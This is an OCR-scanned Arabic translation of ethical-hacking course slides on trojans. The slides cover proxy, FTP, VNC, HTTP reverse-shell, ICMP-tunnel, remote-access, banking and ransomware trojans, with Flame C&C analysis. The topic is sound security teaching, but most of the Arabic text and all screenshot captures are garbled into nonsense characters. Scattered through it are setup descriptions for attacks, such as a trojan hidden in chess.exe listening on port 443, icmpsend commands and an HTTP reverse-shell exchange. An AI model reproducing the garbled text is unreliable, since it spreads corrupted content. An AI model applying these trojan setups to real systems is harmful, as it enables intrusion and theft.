jVL-3VI ^ axj ^ e U^I J! J^jll ^ ^1 .jjjki ^ Proxy server Trojan j* W3bPrOxy Tr0j4nCr34t0r 




W3b PrOxy Tr0j4n i 
proxy server Trojan 
which support multi 

connection from 

many clients and 
report IP and ports 
to mail of the Trojan 
owner 
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g A\ JjS <J jll cJ^-^ t '^'"^ ^Uail! cJ^j 21 diA^j^a cs-^j ^j^ 3 a * u jj! ^ jj FTP Trojan 

Lu> tcJ^jjouJl jl^aJl FTP <jV 




Hacker Victim 



FTP Trojan: TinyFTPD 




Command Prompt 



C : \Doenr!»nts and S&-ttiifiga\Acam±ti\l>*a t-top\T±3ay 
win 90 all RWLCD 

Ti ny FT FD VI . 4 By nin£ggl} rop 
FTP server la started 
21 

55555 
test 
■best 

<z : \win98 
all 

192 .16l.lfiS.lfi 

Yes 
Yes 
Yes 

Yes 

Ko 
Ho 

Time Out Thread Cr«at«d Succtssfully 
+ ************ itniting Fqi New Connection * 
Connection Is In Use 



FTTPTJ 21 55S55 teat teat c:\ 



ControlPort : 
BindPort : 

Password : 
BomeDi r : 
Allowd IS> : 
L-oca.1 Addi"9 3£ : 
E^eadAccess : 
RxitiAccsss : 
Lis tAc ce s s : 
Ci e a taAcc ess: 
DeleteAccess : 
Bxecut«Access : 
Jn 1 o ckAcc ess: 
AnonymousAc ce 
Check 



FTP Server 

Vifl K iii dtivc C hi ua lalfcl 

Enid l»tn La B1SE-D1TI Diiwrtoxr <■£ C:\ 

flS/li/iaia d MlfOUXCEkLl 1 

4t/Q*./3AL£ dUK> Dmtm 
(|I3,-L1,'£[JL2 DvoMEBia — 1 



/NC Trojans 



^ £>i& 6^1 Jjia <l^a^.l (jC t Lu£H ^aJJ <jl . VNC^^ ^J^^-^ <— JJJ*^ ^al^klajV ^jaa^I^aII ^jujJ VNC TFOjailS 

•^UaUl l-u^j U.b£< ^t^-ail ^ Jjj 

.ojjU^II ^ ^iliJ! ^ JxixJI (VNC daemon) VNC ^ - 
"secret" >Jt <-cJS ^ VNC viewer c> c?' fl^^j <-^l 



Command and 
control in struct i d rt 



VNC Traffic 





Victim 



VNC Sorter 



https://www.facebook.com/tibea2004 



517 



VNC Trojans: WinVNC and VNC Stealer 

.VNC Trojan e 1 ^ <> OP* VNC Stealer j WinVNC 

WinVNC - 

<jjj^ta (jji^ig-All q\ ciii^. •^•^iJl ^aj ciii^j Widows ^ ^5^* ^jK^ u1 ^ o^j^ <J j^aail ^^ikiLaLj WinVNC 

VNC Stealer - 

: JUi ^IjU! *bV VNC.EXE ^ .Visual Basic VNC Stealer 

.software packing process fl^i^ U J/j l^mxj <WJ1 
.ijiaVl £il jj^^j ^IkkVl 4 JjU* jll < system tray pop-ups 
. (system registry)^^ CjUuJI < 

(process hijacking) Process's Virtual Memory - 

Jja^s j| ^Uaill ^ ft yr^ j CjLLc ^ process hooks code £ j jj ? j*t 

.Dynamic Link Library File 



WinVNC 



WinVNC: Current User Proper tiers 



Accept Sock. erf Connecboro 



OK 



r Accept COR&A C*r*Teefcori, 

I - Disable Remote Keyboard & Porte* 

I - Doable Locarf Keyboard & Port er 



Update Handfcng 
I PolFul Screen 

^ Pol Fwegr<wcl W«Jov» 

I - Pol Wndow Undei Cmor 



Pol On £ vert 
JOnlv 



VNC Stealer 




II . :i 



HTTP/HTTPS Trojans 



HTTP ^ (reverse way) <J lWjj *^-aJI ub^ 6- t?i jj 1 ^ HTTP/HTTPS Trojans 

a jAjj SjlkUl i aj.v.A<l Jc. ojlA ojl j^>la S'i, ^■■vi Ijijj ^jj _gQ j^aiallj ejjjjj^l <Lbi ( _ s Jc. 4_ajlall ejl^l jll - laamj .(HTTP tlWtiel) 

l$] iejj^j t^illj ^jUaJI "-i^**! js-^j li* child <-y^ .uj** ^ ?j j J£ child (spawn^J^ 
^jJI c-ujll fi-i-j c^'j ' (local shelVjfe^* Jj «JS j ^jL li* child g^ji ^* j .^j^V J_^jii 
^ ^jjAaII HTTP ^^j^^ .Sj*^ *^ j^j J^j j^j HTTP ^ J^V^ ^f^ 1 u^-W^^ 

(local shell) kL'^W ^ Uiiii child-^ j^' c> ^Sljll ^ o- 3 ^^ s^j^^ 

^ 'Cgi-string-S j BASE64 J 4^ ^ (traffic) jjj* J^j^ ^ .^^31 
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Slave: GET/cgi-bin/order? M5mAejTgZdgYOdgIOoBqFfVYTgjFLdgxEdblHe7krj HTTP/1 .0 

Master replies with: g5mAlfbknz 

<> "Is" >abU j*> jaJI Hp^I c> (command prompt) jVl JaSa ja (slave) <^WI < L^J] GET 
^ cj^Vl P j! lilj .MASTER J\ ^ ^ ^ Jj^ SLAVE .(MASTER) ^J^\ ^\ J* 

*<y*\\ jjA* lil 4_IU> ^£ mLs ^\ f* <A.5L-a}j <ia (jSaall 4 £ *J ^ig-xJl jl£ 'Sliell^- 1 ^ J^J ^ ^\ ^Uij child 

(password) token ^j^-j <jj" i J jj ja ^-* lsj^ * t^-joiib <u JL^ajVU ^IS ^ ^l^JI J) JL^iVI 

^UjJI .^a* jjSj (full-featured web proxy cachej <squid < J^) WWW proxies .Sji^l GET CGI 
cJ^-uijj .L_aL J£3 J^k 260 6 SLAVE j MASTER ^IjJI J j**-* j^*-^ 3 ^j^' .^jUI-uJI ^ <UjuiI *UaL 
J^-^ j 'SLAVE "rwwwshell.pl slave" ^ JjjL j& tSllij 4 ^j^ » ^ t ^jSII rwwwsheLl.pl ^ ;l^J.ikU 

. JL^fU p yai SLAVE ^ JjU, g^l c^ll 1£ MASTER J* "rwwwshell.pl" 



HTTP rgqunt 
to download a file 



Victim 



Trojan pdib+Jb through 
HTTP reply 




Server 



HTTP Trojan: HTTP RAT 

jj2 jj RAT J clA^ CP" f ^ l) <JLoilal3 ^uujJj 4ijjJa>Jl jj jJla^ll Cf"^ (jg& RATS 

RAT <yjj^ l^l-i^l o^j 6L_a^JI ^Lkjl! jlkl ^ j^aj .<-i^l jjjju^l J^. % j UuM backdoor 

^Ia^. S^aLuLg ^\ * all ^j£^<uJl (Ja^J <^^J L^J^V^ *^ £y* * ^ RAT .botliet ^^jjj A^lstjJall jfi j±±j&1\ 



HI1PHA10J1 



kHTTP Ha 



■ . .;r ■; ■■ .I-.- .- r ■ .-r-.tr-,, ■ .1 i i . .- --i I 



Inluc t thy wicf im'i computer with 

ejt^dnd plant HTTI^ Trojan 



The Trojan sends an email 
with thf lonatian nf an IP addr^ 



0 



A 

Generates \ 
server . ex© I 
usine HTTP RAT : 




Connect to the IP adtffess 
using a browser port SO 




Victim 



Attacker 



Displays ads, records personal 
data/ keystrokes 

Downloads unsolicited files, disables 
programs/system 

Floods Internet connection, and 
distributes threats 

Tracks browsing activities and hijacks 
Internet browser 

Makes fraudulent claims about spyware 
detection and removal 
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Shttpd Trojan - HTTPS (SSL) 

.Wb 3 ^ u' C++ source code ^ <J^ 4 \i *> ^ cs^'j HTTP j*> Shttpd 

s^j J) j^j^f*^ cJjj^ «j gr^J chess.exe 4 \j* > ^ u^ 1 ^ Shttpd u' i> 



.chess.exe J*j&&\ jW 'M-^j 

.(SSL) 443 ^ c> fcl^Vlj ^ lU^ J ^ Shttpd 

■ http://10.0.0.5:443 f 1 ^ 1 ^ t> J-^VI ^ 




Attacker 
IP: 10.0.0,5:443 




Norma I Firewall allows 
you through port 443 



Connect to the wictim using We h Browser 
http://10-CKlL5:443 



Victim 
IP: 10.0.0.8:443 



Infect the victim's compjter with chess.exe 
Shttpd should be running in the background 
listening on port 443 (SSL) 



[CMP TUNNELING 



f >J3 cAAaA\ * y± arbitrary information & if- lU*^ .-W^ ICMP tunnel(ICMPTX) ? 
A (Covert channel) ^ c> ICMP_ECHO traffic ICMP_ECHOREPLYj ICMP_ECHO 

oUSl! £>i& ^Ia^IujI ci*^ 6 ICMP ECHO traffic ^iAjj^-q ^ $ .tunnel c : ^ 

masquerading uj^ jj-^ ^ .W^^j j' ^ s^Um l tl^J^ ^ jj^JL (j^jij <LLouj j^a^I^aII 

.ijjlkJI c^UjixJI <> ^ (tunnel) l+S-s P >II ^ ICMP_ECHO traffic 

^usu > Lj&M <Lta jjc. Jj^jjjjj ^ CjULJI plikj ^ ^.l^Jl ^1 Aijjiall ^ (Covert channel) ^ j^3t 
^ J-^W (Covert channel) 4j>Jt sliill ^ . j*J JjSjjjjj ^ JjSjjjjj Ja^j ^1 j funnel 

<jc 6jUc lg lx^j 11a , (Covert channel^So^ U' ^ <s ^ *j ^^^^ ^ ^j^ r< .^j>»iljqll ^Uaill ^1 l_u3LojI 

.L-fl, ^ im^ t Jl^Jl backdoor ^j^^ ^LSII ^ ^L^ jl u^ 1 ^ attractive mode 




m 



ICMP Client 



^* (Command; 

icmpsend <victim IP>J 



ICMP Trojan: 

i cm p send 



ICMP Server 

(Command; 
icmpsrv — IrtstAll) 



Command Prompc 



lend 12T. 

[ IE U P I mri v 1 II kMJ i: T U ii'.r.nr | 



Hi 



Comirbaiids 
are sent using 
ICMP protocol 



Command Prompt 



—I lOri^M -i n kfplun T— 

—I I mut — i — iIm 3— 

_l Wi/U ]- 



I 



CVtoamwti and BMh^VAdmlnlqtrwtur.VWaKIWS^IhtalddfiWa 



https://www.facebook.com/tibea2004 



520 



Remote Access Trojans 



tAxj CjULJI Jj^ajll ffii^ j o^^JI L-fl ^" .. i^ t ^Uiill Jic a1*\£1\ s jkiJI jajj Remote access Trojans 
iaidll £-*1uijj t^U£ Remote access Trojans cs* ^ j ^-^^ j <<^aUJi d^t^xJI j 

tiijj^a ^1 Bugbear virus < j^f .NetBus Trojans j Back Orifice Trojans :lU^ ^ ^ 

.jUjjjII ^ yr-u^c JU^jI *1£>V kikkjl l server.exe ^ (Rebecca f s)j^j^^^ jW -M^-a] -1 
.(Rebecca's) ^ > ^ t lU£ <^ <jJ (Jason) -3 




Remote Access Trojan: Rat DarkComet and Apocalypse 

ji ^ikjjaixJ! ^Ic ^jj^ l-jL^xaH jlg^JI (j-* AjjbVl CjI jUl<»VI j Jajl j^all (jc J jj^a jll till ^jjj c _^Jill sbVl ^ DarkComet 
clA^ c5-^"j ^^J. j j^jj^^^j s-^j^^ ^^j^^ '(cind)^^^ ^registry tCjULajLii J jj^a jll till jSjj 

jULJI Jjii^ul (.dll) ^jULII ^-UuJIj cU^U registry ^ sbVl ^ Apocalypse Remote Access Trojan 



«f DiiitrCcmrl HAT 

V?nrtect.«n £H 



I 14- 



ISM*] 



H^in L tttancf? At cut 

V.^rUnJ : P**t 

m. • w/ [.1*3.1.. . 

• «.4j;[nj.. 
i. l-i^j :-=;_: . 
■MP- m 27/ [1*3.1. .. 

— — 

»»/[l*i-. 

i — ■«»isa/[L«i.... 

2?j [1*2.1. - 
4. a : :*2.. 
■Mi ^ ► +2.+1 .' : L*Z. .. 

■ ■■TT.iiir i 

jQ7y[i*=.l.. 
• i* M-y [ltMfl, 

■ — -m. L+J .' [:*Z . 

■ • — in,i[Ts 2. 

5 1 y [ 2. L. 
fl^y [l*2 r t- 



/i2/*J/»HJ 



PC Je-R^JT>«. /trrrpM 
PC-CE-HQ] /-SVST^t 

muz / sir£T&) 



ANTHQNUIjGPCZ / ufl... 
PC ^E-a-CUCO ,' 3*1*.. . 

LSCBOT^CI J STSTf M 



V*.lrl*V... 

.■errT*cf ... 
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Covert Channel Trojan: CCTT 



tj* ±2xl\ <iS3 jSjj <jU . ^aa A \ cjljjall fUuV obi ^ (Covert Channel Tunneling Tools) JL^iVI cjl^ja iiiljJ 
f Lkj l«j ^1 c^ 1 (HTTP 'UDP 'TCP) (data stream)^^ 6" ^ hAjLjjH Jaj jS! C UJI j ji^sl U^l jjUl 

Jail CjljjS Jlij t^jjja all jl jikVI ^jUsj t*S] o^-JJJ (CCTT) cS^-ll JL^sjVI iji jj3 CjIjJ .^ill Jl J jlU f^jll 

^ylc J j . ^i-sl l t> (j^aalfrJI (jixu Lil ^l J^j^ijUj ^^jII ? Lkj l^j jii gjll (data stream) ^-ibJI <j}" g-i dULJl 
j ^ TCP/UDP/HTTP CONNECTIPOST^I jtfll J*^ aAA .^l j UiJil *£*51l Jib <> ^ jU. ftel(shett) 

.U±\A\ boxj c^j>i (.ell 'POP 'SMTP 'SSH) TCP data streams 








11 




□era 















Firewall 



Proxy Chain 



Target 
Services 



E-Banking 



i ^jj c— < dijjjjy( Ajajj^axJI dj^^LdU-JI CjU^jiiil Lloujj I^^j lS^^ cii^jj^al j 1^ SjjJak E-banking Trojans 

Jl l-i^j V tillil .<ajjoil3 ^ - aaVI ^Jlj ^^Vl .^Jl \l±uu* ^jj ^jL^jjiill -c ^ijj^a>JI ^ 1 a^-ll J 

^ilsuj JLii^Vl ^ jill (j-G ^^ic I jjoJ Ul^uJall St&Jt L_jLud^. c Luj£ ^ screenshot <*-jUa£3 ikU ^jL^. ^jIj .c&JI 

. E-banking Trojans^ ^I^i^Ij ^ (J^\ 



malicious j 



Mai ware Server 



Mai iekHJS adverti se mersts 
fiublEihcd among the EcgiiimaLG website 



to erected ; 
website ■ 



The website redirection 
Id the malicious exploit kit 



Legitimate 
Websites 



User redirects to 
malicious suploJt kit 



The User's PC exploited 



Financial Institution 



User access bank &JC 



Manipulates user's 
bankLrdnbactitm 



^ Benids fnilruction to the Tiujan 1^, 



Trojan reports user activities 



< Instruction to manipulate ™ 

! " banks transactions Conrrnl j 



Control and 
Command Server 



Reports, about successful/fatled 
rjransa-ctiori 
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exploit kit ul* Aj""^ exploit kit i> ^ <^ H^J^ j*j 

<jJa^lc> (malware) SjLjall £c-gI Jill .6,j|jj]a ^jl - C-UJJj] 11a ^.J^klLoaJj 4_i^jJa3l ^aUaj ^^Ic 4_Lia^j La ^^Ic SjlaJjgJ J ^1x^.1^13 

(jLa. jJjJl Clli^ ^ botliet U*^ 1 U ^ ^Uaj .CllLuijjjil] S^bja all (j-a l!^ VI Lgic i ftjjj^H Vj 

O^LUlj ^a^lA. IgJLuljl ^JJ £tJjtjj t^jUuiall ^3jJ '(jjj-^ ^^JjoixJI f"^) <-! J^^l J.?? i ^ ^Uucl 

^jli tdljjljyi JJC- dL>Lil*^J! s-l j^.V tiliill £-3 j-a ^ dl^yLalsLxJl ^joiS J jj^ jib 4_i^jJa3l ^ala lij .(jL^jjlill 

Banking Trojan Analysis 

^iaill ^jj^Aaajou (jjill ^.^IaslSI j ^jj <>>iaj ui a\\ <J Au >*MI CjLd jlx-al! ^^ic J jj^^JU ^aujj i— ^c^U^)j j& Banker Trojan 

tdij jjjVI CjX^U-aII <ajU^ll ^^ki^i Transaction Authentication Number (TAN) :Tan Gabbler 

.XAN i^C 0 <^^\ L_fl^Jl d3ji3y! CjUj^J! a^I ^jj^aII 6^lj^)Ia JJ^ a I iklLujl ^^ic Axusu 

.lJ^JI J Ji^lii TAN 

J jSaJ! ^^kiaaj j dujjjyi jjc ajaj^^I CjUi^kll I J jl*. jjia ^ jilt I^a ;HTML Injection 

ID <jI*13 3JUi £>i& .cijLaij^al<JI c qVi^ ^ ^£ <^.li<JI ciijjjjyi CjULiJI 3_^^l<i <1loj j I a& ;Form Grabber 

E-Banking Trojan: ZeuS and SpyEye 

ZeuS ^ 

http : //www . secureworks .com ^ 
cil3i£ j Grabber ^ & c> aS\ U£ ciujjjyi a-^j-^JI dsXiU-Jl ^j^j dj^i ZeuS 

ZeuS 4_kjau3l . jjAijjll iaia L_fl^jjaijZeus botnet .cJ^^'VI CjUaia^j Jj-^jII J!>Lk ^^joujj cJ^^ 

;CjUi jlx-<JI AijjaJ CjIj^II <Lil^ <iLajjj J-<u1j j tdia jll ^jj^ .Windows Vista lS^^I ^Uaj ^^ic ^^i^. 

.HTTP is* c^IjLjjII - 
.Windows Protected Storage ^ ^Uu^VI CjUUj c_jLu^ ^j^j - 

.https j^J^l ^UiL ^-aUJI (PKI) ^1*11 sjI^jua c> 6 ^ c^^j X509 tij^ 

.pop ^ju^j ftp ci>^ - 

.Flash cookies j HTTP cookies ^Wc3j^ - 
.cjU Aijjoj j^ljc-V Ai.^ nn^l jil jxll ^ HTML cjUq>^i Jj^*j 

.Ai^i^l ^i) t> HTML J scraps j i^L - 

.(%systemroot%\system32\drivers\etc\hosts) (/oca/ file)J^& u j*j > ^ 1 Jaxj 
https://www.facebook.com/tibea2004 AjjL ^^aa^a 
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.arbitrary programs ^Lj lU^ - 

. jjibj ^£ jjIS jjc^ jj jjfft^ll J*^j ^ *3 ajujUJI registry keys 

SpyEye *k 

,4i^jjaa>JI dijjijVI cjULoi^JI <JLJI 4ijjuJ g all ^j-<» I^I^jjujI ^jj ^^jII cijLi^ SpyEye 

.^1 ^ cj5U**1I 



y ■ 7s uS Can 



13 



Li i.h teZXE- 



Suite' 
C^nrij -and luedsr bulling 
Srtf&corf*j fit; 



] Mt »tf a I [ Mdowflg | [ ft 



OJtput 

Lssdng xrfig Hit CA2ccjn*nt< >md 
u'Mcrc ludti fie X Mmlj rants and 

^thflc;/.Eb^^Jrtl:h\D^l^^iQp^T^«3^^^lD_S&J=lfc^ i * w » , , 

thwr_tcnllg— SSQOOOOi 6CCCD 

mi ■■! J\< 

fiYi5i_:tJt.— 31UUUUJ, tOOOO 

if l..tDriFa4ttp ijL^LE.l'tE, LQ, ZfaraitMti f 'vM»&},br' 

i rlj-mpf-hrln !j i Vnf<mvf.. -m} 

bJd succeeded' 



Spy Eye ,. 



I Mk 

I ■ IM-lt 



hitiwflii-l 














•41 




-* 


* — — ■* = 1 






•It 


:k 






M 


■■■ IiiimIm injmn «t 






s 











Destructive Trojans: M4sT3r Trojan 

<Jjfi Ujiiti dal c\\a\\ ^jj 1 ^all jj;^^ jW-^ cl>^ ^—j^i^l L_fli^. jl jj q £3 L ^ s\ ^jL^jjj ^a ]M4sT3r Trojan 

£^J^ J ^— ^ J ^ \j» * 4 A j A S-l^V logiC bomb £c-GJJ-a jl \ fr-llc j IaJ > uJ (jl (j£-oJ ^^31 J 6 6^1 JJ^a (jl > ^>^> 

Ail^l format a^l jjiall .(Jj/r-uull ^»Uaj A j£ V 4_i^jJa3! _ JjlxjaLill ^aUaj jJ^o ^JJ ^ajL (jL^jjIill I^A ^jli t<L« nil ^aJJ LdAiC. 





Notification Trojans 



Notification t ^aujal l ^Uij lU^ ^ j .^W^^ ^ j^ > ^ t j^^^ jU^ IP lUjj Notification Trojans 

I^VIS ^^13 U^Ixj ^1 £jI jUa^VI (> ^^xj .^l^all Trojans 
.^l^ll Sj^Uxi jl^kj ;SIN Notification 
.ICQ ^ ^I^L-U ^1^1 >au ;ICQ Notification - 
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.^VJl e iA PHP ^ J\ l^j c> ^UUJl cUjj ;PHP Notification 
■cP jj^VI AD**' c^j^ 3 J-^} :Email Notification 
.net send j*Vl <> jtkkVI JUj] :Net Send 
.^Vll PHP ^ Jl L^j J^U c^LJ! cUjj ;CGI Notification 

.IRC ^ ^l^ki^U ^1*^1 jla^j :IRC notification 

Credit Card Trojans 



1 j c^UjjVI djlilkj ^ISjl Jlft J^alij t allk^ ( j r A^j ^ jij l^Jli ^A-puJall ^Uaj 1$ ^jj j) ^j^aj 6 Credit card Trojans 

(jl ^flllsu ^jUujVI <aUaJ ~ laJLu^o (Jaaj l^-jl Cilia dljjljVl JJC- 4_i3jj^>Jl CjUj^JI (Jja i j-aj ^Lodl ^jj 4 jjj! jill (Jj > <a1 9J 

AjjUaJ ^al,Jjkjjuil j dlLi jlx-<Jl £-<^J (j^Gjli (jj^ig^Jl ^jli t^JjilaxJl dlLi jlx-<Jl ^^Jc ^.JjkjjauJl <J j^.,J .Jj^aj ^j'qj'q^ ciliJl CjLg jlx-a 

4\"% > ^1 (jj,J > /Ml ^I^Vlm^U ^jUujVI 

jl >^ . jiil jill Ji^lii j <CVV2s ^AiUaJI JSa UUuJall AiUa±j ULiiall 4_uUjjVI cjUUJ! jjjau Credit card Trojans 

^ jij S,j|jjla ^,j| j^/i"lt aflLa /j 1 uJI CjLg jlx-<J! jL^^lj jll 4-lJjjj£3yi 4-i3jj^>Jl ojL j ^LqA^LuiaSI £^,Jjkj S,jI jjJa 

-C 5 ja.Vl jll c> ji 'IRC 'FTP ^jj^V 1 ^I^IuiIj axj jo ii^l jiU ^ajjjaiJ! CjUUJ! Jft 



fig 



Attacker 



Victim 




Credit card Trojans steal victims' credit card 
related data such as card no., CW2, and billing 
details 



Credit card Trojans trick users to visit fake e- 
banking websites and enter personal 
information 



Trojan servers transmit the stolen data to 
remote hackers using email, FTP, IRC, or other 
methods 



Data Hiding Trojans (Encrypted Trojans) 

jii ; JLaxlu^U <LaJL^a jjc. CjULiJI Jjc^jj > jj jjj^ cs-^* ^—^-^ jj^* 1 v ^ j^j Encryption Trojans 

cjUIaju ^Usll UL^jJall Ijji^j jl Aj^ij ^jjJUaj ^jj^^l £ a\\ "bMtt a jjj>» \ A ^ Document ^1 ^ L - J ^^^^ j^j 

jjq> : »rij ^ajL ^ill ^xiljjJI ^jc diiaall J V" cijliLJI ^iil jxJI JjILg djjjjjVI (j-aLkll drugstore ^-^j^^ 
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Encryption Trojan encrypts 
data files in victim s system 
and renders information 
unusable 

"Your computer caught our 
software while browsing 
rilegof porn pages, alt your 
documents, text files, 
databases in the 
folder 

My Documents 
was encrypted with 
complex password/ 




Attackers demand a ransom 
or force victims to make 
purchases from their 
online drug stores in return 
for the password to unlock 
files 

'Do not try to search 
for a program that 
encrypted your 
information — it 
simpty does not 
exists in your 
hard disk anymore," 
pay us the money to 
unlock the password 



OS X Trojan: Crisis 

j^ji^SW ^jc backdoor ^kj ^Lkj a^L^ jjSj j j£\ cjUjIxJI Jj^j ^\ s^ljjL jL-a^ OSX.Crisis 

When the Trojan is executed, it creates the following directories and files: 

/Syste m/Libra ry/F ra m e wo rk s/ Fou n d at ion.fra me work/XPCSe rv ices/com .appl e . m d wo rke r_s e rve r.a pc/Contents/MacOS/com. a p ple.mdw 
orker_server 

/Syste m/Libra ry/F ra m e wo rks/ Fou n d at ion.fra rne work/XPCSe rv ices/com .appl e . m d wo rke r_s erver.xp c/Contents/Re sou rces/ 
$ H OM E/L i b ra ry/ La u n th Age nts/com . a pple. m dwprke rpl ist 
$ H DME/Li b ra ry/ Preference^ j 1 3 V7 we. a pp 
$ H OM E/Li b ra ry/Scri pt i ngAdd it ion s/ap pleHI D/Conten ts/l n f o. pli st 

5 H OM E/Li b ra ry/Scri pt i n gAdd it ion s/ap p leHl D/Conten ts/M a cO 5/ U n s A3 C . Bz7 

6 h Olw E/L i h ra ry/Scr i p 1 1 n g Add i : ift n Vap P I ^ h I D/Conte n cs /Re sou rxe$/a p p leO aa k. r 



: OSX.CrisisJ^ <> Ui*i2 ^511 *l* ^ u£ 
.Skype audio jjj* 
_diUaSJ JaUull j ^il > >iJ (jj^ j^jjli jl Safari 
. Adium j MS Messenger^ cjtibU^JI 
.command and control server CjULJI JLajl 



MAC OS X Trojan: DNSChanger 
Ia jjc. jl codecs cJ^^ J) ^j^^-^t j^- cjtiijVI (j^u J / lajuiill a£^1] DNS ^l^c-J lS^-^? ^ ^W^j^ 

4_icL<U^.Vl <juj^JI f <1 jVo'i o^lj^la a iklLaLj .(illi Jl Laj 6 JJ jjU^Jl <jujIjuj Jc ^gJaJ ^»J^ ^ (JiJ jll ads ^Aj^lc-VI 6£ JaJ dujJjVI 

.SjLjalt CjUuIxjII Jj aJj jj ^1 jJl J j^^lj ^jjxijij ^j^^klouJl 
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User Prompts 



Download s 



Users are prompted 
to download a new 
codec to watch 
videos 



User Downloads 



The user then 
downloads the codec 
which actually installs 




Mnl ton JKHJl B C MIPU U.* <MD »PUJH 

T^M* ^k. li.'h. I iviL U-!! jp-I ■ . n - - a •***OCSLCr 



WAHf LJf ^CfMlf loin 



.^l^ll ip jljk, J] ji^Ji DNS ^blJ^j ji^ ^ :DNS settings - 
jjjj V (^5^- -^o^ lS^*^ ^ 4L_flj^<J! <iL j^ll ^c^U^j cIujjj Asu iPlaying a video 

.HTTP post message f bii-A* Will jl^J! ^l^ll J) jU=^l jl- J ^ :HTTP message - 

_As^ MAC OS X ^ ^LA^l SjlaiJi ^ ji ^^ilaj <i^ilja3l : Complete control - 



MAC OS X Trojan: Hell Raiser 














bH ML* in 






* 




































































- ■ . . 























































■■4 i*pi . iW 



■ Mia 1. 1 fi: uirmit wtl 

- Lrz«: r?r . « Mr mu» ra> 



^ WT rCrMi-jTMNWWM J UVMP-t J| 



„. r»i — i c 



hpp MiL « Irh i^p 

I W L.M MnM 

r HI - MM IN #n nTiillr h larH i rai 

I FWI Ml l|| M"«l|i||inniJ>>IMi» 

J W > MM I * Jn Pfwlil N iitf^l j MHjL 
IW MM I I Ja mrill N lnm| j mull 

im EM mi 

■ PH Ilk. ^»|r#FP> »VJp«t %W4* TBW *Hl>P II 

I VM |^wr uimW «*. kwi ■ >iwi 



Note: The complete coverafe of MAC OS X hacking is pr^s^nted in a separate module 
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Trojan Analysis: Flame 

http : //www .kaspersky. com : j^-a^ll 

cs^j (modular computer malware) ^W*J^ l^j 'Skywiper J sKyWlper <Flamer ,Flame 

tCjj^JI clA^j .USB (i^j^ j' (LAN) jjc ^ j^Vl J) j^il jl .(cyber espionage) 

aJu^jo1\ jj jji^H <J u' lA^j ( ; 1 J £ ' " ^jIj^Ia^ l^ajl J? ' "j . jj^>^ ^f^j t^jjlLftll iaLaijj ^screenshofr ^ 
jjj^j cPW^ ^-^o^ .^u*^ Bluetooth ^c^j ^^ill (j-a <JL^jV1 diL* jl*.* lSj^* <J j^-^ t ~ J cjIjLLg J] 

_Aja^all <atkj J^. Flame J ty^t L -*£ 



liencs nata to attacker 



lets command and 




a instruction 
Utct data 



Cwnrrwrwd and 
COnl'OlCvntvf 



rnaiicious UMr 



0' 



Dciwf loads a mad^are 



f) l 



0 



■n IAN. 




Infected Hardwian: in LAN 



NWwirv Server Victim 
S^UUl ^>^y* U^*^ *^J^ UJ^T^ (S ^ O^*"^ L * ' ^ ' ^ ^ j1*-a3I (J jj^a^Jlj 4_l^jJa3l ^aUaj S^lj Ja (jLk^a^. (J^l 

yH jj^V^ f j% s jia^JI .iiuaJI j& f ^ j (command and control center) * j^JI j 

4_L^1a3I (_^^>^.V1 t j j > .^ij L-jU^aH jl^-aJl li^ ,^Uai3l AjU^Ij A-i^jJall ^aUaj C5 ic SjLJa (J-Ia^J <J> ^i^j tcillil 4 a>_nj j 

/ojlnjMill j o^Uill ^^W^^ lS^j^ <jU^-<JI aJ^xJI CjI^jjoJI o^-^-f C5^^ 

:^UJI jaJil ^ Flame CP cfe^l S- 51 ^ Kaspersky 
U3U jj c_fll£&! -aj jl axj Offline jj^t c^u^al ^1 tcjl jiJ Jaxj ^1 ^Flame C&C J ^all 

, l^kj-o ftjLJa ^ J t M > f >n^V (^joj^JjujI^ Jj3 ^j-q 

^1 j t<i^a3! dili ^ j^l j C&C ^ cJ^^ i> Flame V'^"^ ^1 5i cAIia j£\ c> 80 c> 

.2012j 2008 ^ u£ ^ 

tilli ^ Iaj 4d^c j>» Qli (Jsl±u Flame C&C AjSalill t *°J 1 ^ » ^1 j^Jt t^JjJaUJl ^jVl CIjI jiuJl 

.j jUm^ l jjia k&jA^ ^laa jll djUj^SI j <^jIS ^ Flame C&C domains ^ 

^O^J ^JJJ^J -^^jVI (j^)jua3l tilli LaJ O^Astlxi Lq ^ijL^axJl ^Ixi^JjaixJl (Jj^jujJ ^aJ d ^ aII ^g£juj^)ijuA£ (JaslxJ laSj 

jjjIj ll ; u^ll djUi jjujjj PDF ^-i^IaI c^^- ^^i^i p^J Flame cr^W* 



jUxjjIj^ ^a 



•W Flame C&C ^ ^ ^W^ 1 ^ 
. j^-aJI ^ j^modified PPDM compression j Zlib 

.Flame ^ 
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Flame C&C Server Analysis 4- 

http://www.kaspersky.com : j^iJI 

Jd-i jA\ <.o£h ' PHPf^^ j OpenVZ ^-64 *l jdl ^ x.6.0 uUp ^ Flame's C&C Server 
^] . (self-signed certificates)^ ^-2 J^V! ^jjU ^ MySQL ^-h 

^ ^lill s^j AiU^V ^viun .( PHP' MySQL'^U <o£LI) LAMP^I ^l/^UJI 

A_iiL^j\ JJ£3L U3I \ $ \^ un jjLJI(dujj£jajVl) Ajj^aill ^1 jJI c>axj Jj *j& 1 til3i£ j 6 (web-based control panel)^ j^V 

<J (document root directory) csjM ci^ <8080j 443 iiU-JI HTTPS JAwjj Jj—jll 
ljjjJI ^ l^Aflj Ujjjj ^3H cjUIaJI j^aj ^ilt ^HaJI document root directory) /var/www/htdocs/ 

.PHP ^ j <^V>* c5 yr^ J '(u^y JAuult ^UlajL A i^WW l-ujJI ^\ jL ^^-uub^l £l du^ 

l^jl l^jjxaII "str_split" <jl "str_split" function lSj^ var/www/htdocs/newsforyou/Utils.php 

PHP4 f cS^ljij f Ij-jii-y ^jVl ^ c&C JtjSl <^jji^ .PHP4 Je. ^li. ^ V ^Ij PHP5 ^ 

.C&Cs f3 J PHP -11 V^Vl cj| yi l> (f&A 



t j r j i f i 



Frf^H.**^ ^.(Ikf khrit M 



epo*t>c«J Prrt««**» ft«pdM<-fH taqutfttfe Hi^rrtl** 



C onte nts of the / va r/www/h td ocs/newsfo ryou/ d f re cto ry 



( onirol Panel 



Control panel interface 

<SignupProtocol 'OldProtocolE 'OldProtocol ^ ^ ^ J 1 ^^ 1 ^l^yjj* c> ^ frt ^ C&C 

^ j^l lUxJ! !^ .IP j ^FL 'SPE ^SP g?>Jt f^VI lU^ ^1 ^XixJl uJil* ^ cj^U^ ^Ij^V RedProtocol j 
(decoding) j^j^ 6 Jl^VI CjU jix-d Jj> > .n ^ t Jj^jj jjJI jl^aj ^^xj3U I^jj ^1 j C&C 6^ W*-* J-«^^ 
